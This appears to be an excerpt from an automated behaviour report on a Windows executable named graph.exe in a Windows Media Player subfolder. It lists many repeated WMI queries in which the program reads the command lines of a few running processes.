                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6600
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8276
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1712
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
                              Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9788
